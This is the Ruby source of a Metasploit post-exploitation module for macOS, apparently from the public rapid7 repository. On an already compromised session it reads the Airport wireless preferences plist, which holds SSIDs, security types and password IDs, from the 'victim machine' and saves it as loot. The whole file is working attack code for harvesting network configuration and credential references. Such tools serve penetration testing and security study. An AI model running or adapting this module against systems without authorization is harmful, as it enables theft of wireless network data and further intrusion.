metasploit-framework/modules/post/osx/gather/enum_airport.rb

73 lines
1.8 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
def initialize(info={})
super(update_info(info,
'Name' => 'OS X Gather Airport Wireless Preferences',
'Description' => %q{
This module will download OS X Airport Wireless preferences from the victim
machine. The preferences file (which is a plist) contains information such as:
SSID, Channels, Security Type, Password ID, etc.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r'],
'Platform' => [ 'osx' ],
'SessionTypes' => [ "meterpreter", "shell" ]
))
end
def exec(cmd)
tries = 0
begin
out = cmd_exec(cmd).chomp
rescue ::Timeout::Error => e
tries += 1
if tries < 3
vprint_error("#{@peer} - #{e.message} - retrying...")
retry
end
rescue EOFError => e
tries += 1
if tries < 3
vprint_error("#{@peer} - #{e.message} - retrying...")
retry
end
end
end
def get_air_preferences
pref = exec("cat /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist")
return pref =~ /No such file or directory/ ? nil : pref
end
def save(data)
p = store_loot(
"apple.airport.preferences",
"plain/text",
session,
data,
"com.apple.airport.preferences.plist")
print_good("#{@peer} - plist saved in #{p}")
end
def run
@peer = "#{session.session_host}:#{session.session_port}"
# Download the plist. If not found (nil), then bail
pref = get_air_preferences
if pref.nil?
print_error("#{@peer} - Unable to find airport preferences")
return
end
# Save the raw version of the plist
save(pref)
end
end